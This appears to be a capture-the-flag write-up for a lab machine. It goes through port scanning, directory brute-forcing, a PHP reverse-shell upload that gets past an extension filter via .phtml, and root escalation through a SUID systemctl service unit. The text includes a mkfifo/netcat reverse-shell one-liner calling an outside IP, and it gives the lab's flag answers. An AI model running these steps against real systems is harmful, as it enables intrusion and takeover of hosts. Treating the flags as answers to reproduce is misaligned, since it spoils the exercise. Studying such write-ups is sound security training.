Learn about active recon, web app attacks and privilege escalation.
scan the machine
nmap -A -T4 10.10.196.8
there are 6 open ports (21,22,139,445,3128,3333)
check the webpage at port 3333
scan the directory with gobuster
gobuster dir -u http://10.10.196.8:3333 -w /usr/share/wordlists/dirb/common.txt -t 30
i found a secret directory /internal allow file upload
let's create a reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
when submit, i see it filtered
so, try find out the allowed extension with Burp intruder
make a wordlist with the following extensions
you can see a diffirent length in .phtml
check the /internal/uploads
open a netcat listener
nc -vlnp 1234
look around home folder, see a user call bill
and our flag
Flag | user.txt |
---|---|
Answer | 8bd7992fbe8a6ad22a63361004cfcedb |
listing file with suid bit
find / -user root -perm -4000 2> /dev/null
i see an interest /bin/systemctl
i found a document for it
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.37.45 4444 >/tmp/f" > /tmp/rev.sh
prepare netcat listener first
nc -vlnp 4444
now create a service and run it with systemctl to get root
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/rev.sh"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
here you are
Flag | root.txt |
---|---|
Answer | a58ff8579f0a9270368d33a9966c7fd5 |